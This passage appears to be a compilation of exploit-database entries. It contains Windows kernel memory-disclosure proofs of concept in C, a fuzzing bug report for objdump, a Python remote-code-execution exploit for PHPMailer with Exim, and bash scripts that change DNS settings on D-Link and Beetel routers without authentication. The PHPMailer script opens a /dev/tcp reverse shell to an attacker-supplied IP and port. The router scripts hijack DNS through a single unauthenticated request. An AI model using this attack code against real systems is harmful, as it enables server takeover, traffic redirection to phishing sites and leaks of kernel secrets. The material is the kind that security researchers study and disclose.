Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
extern "C"
ULONG WINAPI NtMapUserPhysicalPages(
PVOID BaseAddress,
ULONG NumberOfPages,
PULONG PageFrameNumbers
);
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
VOID MyMemset(PBYTE ptr, BYTE byte, ULONG size) {
for (ULONG i = 0; i < size; i++) {
ptr[i] = byte;
}
}
VOID SprayKernelStack() {
// Buffer allocated in static program memory, hence doesn't touch the local stack.
static BYTE buffer[4096];
// Fill the buffer with 'A's and spray the kernel stack.
MyMemset(buffer, 'A', sizeof(buffer));
NtMapUserPhysicalPages(buffer, sizeof(buffer) / sizeof(DWORD), (PULONG)buffer);
// Make sure that we're really not touching any user-mode stack by overwriting the buffer with 'B's.
MyMemset(buffer, 'B', sizeof(buffer));
}
VOID SprayUserStack() {
// Buffer allocated from the user-mode stack.
BYTE buffer[4096];
MyMemset(buffer, 'x', sizeof(buffer));
}
LONG WINAPI MyUnhandledExceptionFilter(
_In_ struct _EXCEPTION_POINTERS *ExceptionInfo
) {
PrintHex((PBYTE)ExceptionInfo->ContextRecord, sizeof(CONTEXT));
return EXCEPTION_CONTINUE_EXECUTION;
}
int main() {
SetUnhandledExceptionFilter(MyUnhandledExceptionFilter);
SprayKernelStack();
SprayUserStack();
RaiseException(1337, 0, 0, NULL);
return 0;
}
#!/usr/bin/python
#
# Exploit Title: [RCE for PHPMailer < 5.2.20 with Exim MTA]
# Date: [16/06/2017]
# Exploit Author: [@phackt_ul]
# Software Link: [https://github.com/PHPMailer/PHPMailer]
# Version: [< 5.2.20]
# Tested on: [Debian x86/x64]
# CVE : [CVE-2016-10033,CVE-2016-10074,CVE-2016-10034,CVE-2016-10045]
#
# @phackt_ul - https://phackt.com
#
# Find the last updated version here: https://raw.githubusercontent.com/phackt/pentest/master/exploits/rce_phpmailer_exim.py
#
# All credits go to Dawid Golunski (@dawid_golunski) - https://legalhackers.com
# and its research on PHP libraries vulns
#
# PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)
# PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass
# SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)
# Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)
#
# ExploitBox project:
# https://ExploitBox.io
#
# Full advisory URL:
# https://legalhackers.com/advisories/PHPMailer-Exploit-Remote-Code-Exec-CVE-2016-10033-Vuln.html
# https://legalhackers.com/videos/PHPMailer-Exploit-Remote-Code-Exec-Vuln-CVE-2016-10033-PoC.html
# http://pwnscriptum.com/
#
# --------------------------------------------------------
# Enhanced for Exim MTA
#
# N.B:
# The original author's method in the PHPMailer POC (for sendmail MTA) uses the RFC 3696
# double quotes technique associated with the -oQ -X options to log mailer traffic and to create
# the backdoor. This technique is not facing some payload size issues because the payload
# was in the email body.
#
# For Exim:
# The original author's Wordpress 4.6 POC for Exim combines the comment syntax (RFC 822)
# and the Exim expansion mode techniques. The use of substr on spool_directory and tod_log
# expansion variables in order to bypass the PHP mail() escaping may leads to large
# email addresses payloads. However the comment syntax validateAddress() technique does not
# face any size limitation but its use can not be applied for PHPMailer < 5.2.20.
#
# Goal:
# The use of double quotes validateAdresse() technique (and it's patch bypass for PHPMailer < 5.5.20)
# combined with the Exim expansion mode technique may leads to large payloads quickly facing addresses
# size limit here (260 chars) and so not matching the pcre8 regexp in the validateAddress() function.
# We are now base64 encoding the command in order to bypass escapeshellcmd() and allowing larger payloads.
#
#
# Usage:
# ./rce_phpmailer_exim4.py -url http://victim/phpmailer/ -cf contact_form.php -ip 192.168.1.109 -p 1337
#
#
# Requirements:
# - Vulnerable PHP libraries
# - Exim MTA Agent
#
#
# Disclaimer:
# For testing purposes only on your local machine - http://pwnscriptum.com/PwnScriptum_PHPMailer_PoC_contactform.zip
import argparse
import urllib
import urllib2
import base64
# Prepare command for Exim expansion mode in order
def prepare_cmd(cmd):
return '${run{${base64d:%s}}}' % base64.b64encode(cmd)
# Send Request method
def send_request(req):
try:
urllib2.urlopen(req)
except urllib2.HTTPError, e:
print "[!] Got HTTP error: [%d] when trying to reach " % e.code + req.get_full_url() + " - Check the URL!\n\n"
exit(3)
except urllib2.URLError, err:
print "[!] Got the '%s' error when trying to reach " % str(err.reason) + req.get_full_url() + " - Check the URL!\n\n"
exit(4)
# Parse input args
parser = argparse.ArgumentParser(prog='rce_phpmailer_exim4.py', description='PHPMailer / Zend-mail / SwiftMailer - RCE Exploit for Exim4 based on LegalHackers sendmail version')
parser.add_argument('-url', dest='WEBAPP_BASE_URL', required=True, help='WebApp Base Url')
parser.add_argument('-cf', dest='CONTACT_SCRIPT', required=True, help='Contact Form scriptname')
parser.add_argument('-ip', dest='ATTACKER_IP', required=True, help='Attacker IP for reverse shell')
parser.add_argument('-p', dest='ATTACKER_PORT', required=False, help='Attackers Port for reverse shell', default="8888")
parser.add_argument('--post-action', dest='POST_ACTION', required=False, help='Overrides POST "action" field name', default="send")
parser.add_argument('--post-name', dest='POST_NAME', required=False, help='Overrides POST "name of sender" field name', default="name")
parser.add_argument('--post-email', dest='POST_EMAIL', required=False, help='Overrides POST "email" field name', default="email")
parser.add_argument('--post-msg', dest='POST_MSG', required=False, help='Overrides POST "message" field name', default="msg")
args = parser.parse_args()
CONTACT_SCRIPT_URL = args.WEBAPP_BASE_URL + args.CONTACT_SCRIPT
# Show params
print """[+] Setting vars to: \n
WEBAPP_BASE_URL = [%s]
CONTACT_SCRIPT = [%s]
ATTACKER_IP = [%s]
ATTACKER_PORT = [%s]
POST_ACTION = [%s]
POST_NAME = [%s]
POST_EMAIL = [%s]
POST_MSG = [%s]
""" % (args.WEBAPP_BASE_URL, args.CONTACT_SCRIPT, args.ATTACKER_IP, args.ATTACKER_PORT, args.POST_ACTION, args.POST_NAME, args.POST_EMAIL, args.POST_MSG)
# Ask for mail library
print "[+] Choose your target / payload: "
print "\033[1;34m"
print "[1] PHPMailer < 5.2.18 Remote Code Execution (CVE-2016-10033)"
print " SwiftMailer <= 5.4.5-DEV Remote Code Execution (CVE-2016-10074)"
print " Zend Framework / zend-mail < 2.4.11 - Remote Code Execution (CVE-2016-10034)\n"
print "[2] PHPMailer < 5.2.20 Remote Code Execution (CVE-2016-10045) - escapeshellarg() bypass"
print "\033[0m"
try:
target = int(raw_input('[?] Select target [1-2]: '))
except ValueError:
print "Not a valid choice. Exiting\n"
exit(2)
if (target>2):
print "No such target. Exiting\n"
exit(3)
################################
# Payload
################################
cmd = "/bin/bash -c '0<&196;exec 196<>/dev/tcp/%s/%s;nohup sh <&196 >&196 2>&196 &'" % (args.ATTACKER_IP, args.ATTACKER_PORT)
prepared_cmd = prepare_cmd(cmd)
payload = '"a\\" -be ' + prepared_cmd + ' "@a.co'
# Update payloads for PHPMailer bypass (PHPMailer < 5.2.20)
if target == 2:
payload = "\"a\\' -be " + prepared_cmd + " \"@a.co"
################################
# Attack episode
# This step will execute the reverse shell
################################
# Form fields
post_fields = {'action': "%s" % args.POST_ACTION, "%s" % args.POST_NAME: 'Jas Fasola', "%s" % args.POST_EMAIL: payload, "%s" % args.POST_MSG: 'Really important message'}
# Print relevant information
print "\n[+] Executing command on victim server\n"
print '[!] command: [%s]' % cmd
print '[!] payload: [%s]' % payload
print '[!] post_fields: [%s]\n' % str(post_fields)
data = urllib.urlencode(post_fields)
req = urllib2.Request(CONTACT_SCRIPT_URL, data)
send_request(req)
print "\033[1;32m[+] You should check your listener and cross the fingers ;)\033[0m\n"
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1169
We have discovered that the nt!NtNotifyChangeDirectoryFile system call discloses portions of uninitialized pool memory to user-mode clients, due to output structure alignment holes.
On our test Windows 10 32-bit workstation, an example layout of the output buffer is as follows:
--- cut ---
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff ................
00000010: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ?? ?? ................
--- cut ---
Where 00 denote bytes which are properly initialized, while ff indicate uninitialized values copied back to user-mode. The output data is returned in a list of FILE_NOTIFY_INFORMATION structures [1]. If we map the above shadow bytes to the structure definition, it turns out that the uninitialized bytes correspond to the alignment hole between the end of the FileName string and the beginning of the adjacent FILE_NOTIFY_INFORMATION structure, if that string is of an odd length (and therefore not 4-byte aligned).
The issue can be reproduced by running the attached proof-of-concept program on a system with the Special Pools mechanism enabled for ntoskrnl.exe. Then, it is clearly visible that bytes at the aforementioned offsets are equal to the markers inserted by Special Pools, and would otherwise contain leftover data that was previously stored in that memory region:
--- cut ---
00000000: 10 00 00 00 04 00 00 00 02 00 00 00 62 00[91 91]............b...
00000010: 00 00 00 00 05 00 00 00 02 00 00 00 63 00 ?? ?? ............c...
--- cut ---
00000000: 10 00 00 00 04 00 00 00 02 00 00 00 62 00[3d 3d]............b.==
00000010: 00 00 00 00 05 00 00 00 02 00 00 00 63 00 ?? ?? ............c...
--- cut ---
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
DWORD ThreadRoutine(LPVOID lpParameter) {
// Wait for the main thread to call ReadDirectoryChanges().
Sleep(500);
// Perform a filesystem operation which results in two records (FILE_ACTION_RENAMED_OLD_NAME and FILE_ACTION_RENAMED_NEW_NAME)
// being returned at once.
MoveFile(L"a\\b", L"a\\c");
return 0;
}
int main() {
// Create a local "a" directory.
if (!CreateDirectory(L"a", NULL)) {
printf("CreateDirectory failed, %d\n", GetLastError());
return 1;
}
// Open the newly created directory.
HANDLE hDirectory = CreateFile(L"a", GENERIC_READ, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (hDirectory == INVALID_HANDLE_VALUE) {
printf("CreateFile(a) failed, %d\n", GetLastError());
RemoveDirectory(L"a");
return 1;
}
// Create a new file in the "a" directory.
HANDLE hNewFile = CreateFile(L"a\\b", GENERIC_READ | GENERIC_WRITE, FILE_SHARE_READ | FILE_SHARE_WRITE | FILE_SHARE_DELETE, NULL, CREATE_NEW, FILE_ATTRIBUTE_NORMAL, NULL);
if (hNewFile != INVALID_HANDLE_VALUE) {
CloseHandle(hNewFile);
}
// Create a new thread which will modify the directory (rename a file within).
CreateThread(NULL, 0, (LPTHREAD_START_ROUTINE)ThreadRoutine, NULL, 0, NULL);
// Wait for changes in the directory and read them into a 1024-byte buffer.
BYTE buffer[1024] = { /* zero padding */ };
DWORD BytesRead = 0;
if (!ReadDirectoryChangesW(hDirectory, buffer, sizeof(buffer), FALSE, FILE_NOTIFY_CHANGE_FILE_NAME, &BytesRead, NULL, NULL)) {
printf("ReadDirectoryChanges failed, %d\n", GetLastError());
DeleteFile(L"a\\c");
RemoveDirectory(L"a");
return 1;
}
// Dump the output on screen.
PrintHex(buffer, BytesRead);
// Free resources.
DeleteFile(L"a\\c");
RemoveDirectory(L"a");
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1166
We have discovered that the nt!NtQueryVolumeInformationFile system call discloses portions of uninitialized pool memory to user-mode clients, due to output structure alignment holes.
On our test Windows 10 32-bit workstation, an example layout of the output buffer is as follows:
--- cut ---
00000000: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ................
00000010: 00 ff ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ................
--- cut ---
Where 00 denote bytes which are properly initialized, while ff indicate uninitialized values copied back to user-mode. The output data is returned in a FILE_FS_VOLUME_INFORMATION structure [1]. If we map the above shadow bytes to the structure definition, it turns out that the uninitialized byte corresponds to an alignment hole after the SupportsObjects field.
The issue can be reproduced by running the attached proof-of-concept program on a system with the Special Pools mechanism enabled for ntoskrnl.exe. Then, it is clearly visible that bytes at the aforementioned offsets are equal to the markers inserted by Special Pools, and would otherwise contain leftover data that was previously stored in that memory region:
--- cut ---
00000000: e7 5e f6 a6 e3 38 d1 01 25 1d a9 2e 00 00 00 00 .^...8..%.......
00000010: 01[84]?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ................
--- cut ---
00000000: e7 5e f6 a6 e3 38 d1 01 25 1d a9 2e 00 00 00 00 .^...8..%.......
00000010: 01[ff]?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ?? ................
--- cut ---
Repeatedly triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
This bug is subject to a 90 day disclosure deadline. After 90 days elapse or a patch has been made broadly available, the bug report will become visible to the public.
*/
#include <Windows.h>
#include <winternl.h>
#include <cstdio>
typedef enum {
FileFsVolumeInformation = 1,
FileFsLabelInformation = 2,
FileFsSizeInformation = 3,
FileFsDeviceInformation = 4,
FileFsAttributeInformation = 5,
FileFsControlInformation = 6,
FileFsFullSizeInformation = 7,
FileFsObjectIdInformation = 8,
FileFsDriverPathInformation = 9,
FileFsVolumeFlagsInformation = 10,
FileFsSectorSizeInformation = 11
} FS_INFORMATION_CLASS;
extern "C"
NTSTATUS WINAPI NtQueryVolumeInformationFile(
_In_ HANDLE FileHandle,
_Out_ PIO_STATUS_BLOCK IoStatusBlock,
_Out_ PVOID FsInformation,
_In_ ULONG Length,
_In_ FS_INFORMATION_CLASS FsInformationClass
);
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
int main() {
// Open the disk device.
HANDLE hDisk = CreateFile(L"C:\\", 0, 0, NULL, OPEN_EXISTING, FILE_FLAG_BACKUP_SEMANTICS, NULL);
if (hDisk == INVALID_HANDLE_VALUE) {
printf("CreateFile failed, %d\n", GetLastError());
return 1;
}
// Obtain the output data, assuming that it will fit into 256 bytes.
BYTE output[256];
IO_STATUS_BLOCK iosb;
NTSTATUS st = NtQueryVolumeInformationFile(hDisk, &iosb, output, sizeof(output), FileFsVolumeInformation);
if (!NT_SUCCESS(st)) {
printf("NtQueryVolumeInformationFile failed, %x\n", st);
CloseHandle(hDisk);
return 1;
}
// Dump the output data on screen and free resources.
PrintHex(output, iosb.Information);
CloseHandle(hDisk);
return 0;
}
/*
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1159
We have discovered that the handler of the IOCTL_DISK_GET_DRIVE_LAYOUT_EX IOCTL in partmgr.sys discloses portions of uninitialized pool memory to user-mode clients.
The issue can be reproduced by running the attached proof-of-concept program on a system with the Special Pools mechanism enabled for ntoskrnl.exe. Then, it is clearly visible that bytes at the aforementioned offsets are equal to the markers inserted by Special Pools, and would otherwise contain leftover data that was previously stored in that memory region. In this case, the marker byte was 0x29 (")").
--- cut ---
00000000: 00 00 00 00 04 00 00 00 ee a2 5d 9f 29 29 29 29 ..........].))))
00000010: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000020: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000030: 00 00 00 00 29 29 29 29 00 00 10 00 00 00 00 00 ....))))........
00000040: 00 00 40 06 00 00 00 00 01 00 00 00 00 29 29 29 ..@..........)))
00000050: 07 01 01 29 00 08 00 00 29 29 29 29 29 29 29 29 ...)....))))))))
00000060: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000070: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000080: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000090: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
000000a0: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
000000b0: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
000000c0: 00 00 00 00 29 29 29 29 00 00 50 06 00 00 00 00 ....))))..P.....
000000d0: 00 00 90 39 06 00 00 00 02 00 00 00 00 29 29 29 ...9.........)))
000000e0: 07 00 01 29 00 28 03 00 29 29 29 29 29 29 29 29 ...).(..))))))))
000000f0: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000100: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000110: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000120: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000130: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000140: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000150: 00 00 00 00 29 29 29 29 00 00 00 00 00 00 00 00 ....))))........
00000160: 00 00 00 00 00 00 00 00 00 00 00 00 00 29 29 29 .............)))
00000170: 00 00 00 29 00 00 00 00 29 29 29 29 29 29 29 29 ...)....))))))))
00000180: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000190: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
000001a0: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
000001b0: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
000001c0: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
000001d0: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
000001e0: 00 00 00 00 29 29 29 29 00 00 00 00 00 00 00 00 ....))))........
000001f0: 00 00 00 00 00 00 00 00 00 00 00 00 00 29 29 29 .............)))
00000200: 00 00 00 29 00 00 00 00 29 29 29 29 29 29 29 29 ...)....))))))))
00000210: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000220: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000230: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000240: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000250: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
00000260: 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 29 ))))))))))))))))
--- cut ---
Triggering the vulnerability could allow local authenticated attackers to defeat certain exploit mitigations (kernel ASLR) or read other secrets stored in the kernel address space.
*/
#include <Windows.h>
#include <cstdio>
VOID PrintHex(PBYTE Data, ULONG dwBytes) {
for (ULONG i = 0; i < dwBytes; i += 16) {
printf("%.8x: ", i);
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes) {
printf("%.2x ", Data[i + j]);
}
else {
printf("?? ");
}
}
for (ULONG j = 0; j < 16; j++) {
if (i + j < dwBytes && Data[i + j] >= 0x20 && Data[i + j] <= 0x7e) {
printf("%c", Data[i + j]);
}
else {
printf(".");
}
}
printf("\n");
}
}
int main() {
// Open the disk device.
HANDLE hDisk = CreateFile(L"\\\\.\\C:", 0, 0, NULL, OPEN_EXISTING, FILE_ATTRIBUTE_NORMAL, NULL);
if (hDisk == INVALID_HANDLE_VALUE) {
printf("CreateFile failed, %d\n", GetLastError());
return 1;
}
// Obtain the output data, assuming that it will fit into 1024 bytes.
BYTE layout[1024];
DWORD BytesReturned;
if (!DeviceIoControl(hDisk, IOCTL_DISK_GET_DRIVE_LAYOUT_EX, NULL, 0, layout, sizeof(layout), &BytesReturned, NULL)) {
printf("DeviceIoControl failed, %d\n", GetLastError());
CloseHandle(hDisk);
return 1;
}
// Dump the output data on screen and free resources.
PrintHex(layout, BytesReturned);
CloseHandle(hDisk);
return 0;
}
Source: https://sourceware.org/bugzilla/show_bug.cgi?id=21587
I have been fuzzing objdump with American Fuzzy Lop and AddressSanitizer.
Please find attached the minimized file causing the issue ("Input") and the
ASAN report log ("Output"). Below is the reduced stacktrace with links to the
corresponding source lines on a GitHub mirror.
The command I used was `objdump -D <file>`.
Let me know if there is any additional information I can provide.
--
Input: 9ed130cf25d8df5207cad7fc0de4fc1f.109246746a4907b00292c7837b29f085.min
Output: 9ed130cf25d8df5207cad7fc0de4fc1f.109246746a4907b00292c7837b29f085.txt
Error in "rx_decode_opcode": global-buffer-overflow
in rx_decode_opcode at opcodes/rx-decode.opc:288
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/rx-decode.opc#L288)
in print_insn_rx at opcodes/rx-dis.c:123
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/opcodes/rx-dis.c#L123)
in disassemble_bytes at binutils/objdump.c:1864
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L1864)
in disassemble_section at binutils/objdump.c:2309
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2309)
in bfd_map_over_sections at bfd/section.c:1395
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/bfd/section.c#L1395)
in disassemble_data at binutils/objdump.c:2445
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L2445)
in dump_bfd at binutils/objdump.c:3547
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3547)
in display_file at binutils/objdump.c:3714
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L3714)
in main at binutils/objdump.c:4016
(see https://github.com/bminor/binutils-gdb/blob/561bf3e950e410fbcac06523d43039f1f58150ca/binutils/objdump.c#L4016)
Additional Information:
The command used was `objdump -D <file>`. The compilation flags used were `-g -O2 -fno-omit-frame-pointer -fsanitize=address -fno-sanitize-recover=undefined`. The configuration settings used were `--enable-targets=all --disable-shared`.
Proof of Concept:
https://gitlab.com/exploit-database/exploitdb-bin-sploits/-/raw/main/bin-sploits/42198.zip
#!/bin/bash
#
# D-Link ADSL DSL-2640B GE_1.07
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " D-Link ADSL DSL-2640B GE_1.07 "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# Beetel BCM96338 ADSL Router
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " Beetel BCM96338 ADSL Router "
echo " Unauthenticated Remote DNS Change Exploit"
echo " ==================================================================="
echo " Usage: $0 <Target> <Primary DNS> <Secondary DNS>"
echo " Example: $0 133.7.133.7 8.8.8.8"
echo " Example: $0 133.7.133.7 8.8.8.8 8.8.4.4"
echo ""
echo " Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>"
echo " https://www.ethical-hacker.org/ https://www.fb.com/ethicalhackerorg"
exit;
fi
GET=`which GET 2>/dev/null`
if [ $? -ne 0 ]; then
echo " Error : libwww-perl not found =/"
exit;
fi
GET -e "http://$1/dnscfg.cgi?dnsPrimary=$2&dnsSecondary=$3&dnsDynamic=0&dnsRefresh=1" 0&> /dev/null <&1
#!/bin/bash
#
# D-Link ADSL DSL-2640U IM_1.00
# Unauthenticated Remote DNS Change Exploit
#
# Copyright 2017 (c) Todor Donev <todor.donev at gmail.com>
# https://www.ethical-hacker.org/
# https://www.facebook.com/ethicalhackerorg
#
# Description:
# The vulnerability exist in the web interface, which is
# accessible without authentication.
#
# Once modified, systems use foreign DNS servers, which are
# usually set up by cybercriminals. Users with vulnerable
# systems or devices who try to access certain sites are
# instead redirected to possibly malicious sites.
#
# Modifying systems' DNS settings allows cybercriminals to
# perform malicious activities like:
#
# o Steering unknowing users to bad sites:
# These sites can be phishing pages that
# spoof well-known sites in order to
# trick users into handing out sensitive
# information.
#
# o Replacing ads on legitimate sites:
# Visiting certain sites can serve users
# with infected systems a different set
# of ads from those whose systems are
# not infected.
#
# o Controlling and redirecting network traffic:
# Users of infected systems may not be granted
# access to download important OS and software
# updates from vendors like Microsoft and from
# their respective security vendors.
#
# o Pushing additional malware:
# Infected systems are more prone to other
# malware infections (e.g., FAKEAV infection).
#
# Disclaimer:
# This or previous programs is for Educational
# purpose ONLY. Do not use it without permission.
# The usual disclaimer applies, especially the
# fact that Todor Donev is not liable for any
# damages caused by direct or indirect use of the
# information or functionality provided by these
# programs. The author or any Internet provider
# bears NO responsibility for content or misuse
# of these programs or any derivatives thereof.
# By using these programs you accept the fact
# that any damage (dataloss, system crash,
# system compromise, etc.) caused by the use
# of these programs is not Todor Donev's
# responsibility.
#
# Use them at your own risk!
#
#
if [[ $# -gt 3 || $# -lt 2 ]]; then
echo " D-Link ADSL DSL-2640U IM_1.00 "
echo " Unauthenticated Remote DNS Change Exploit"
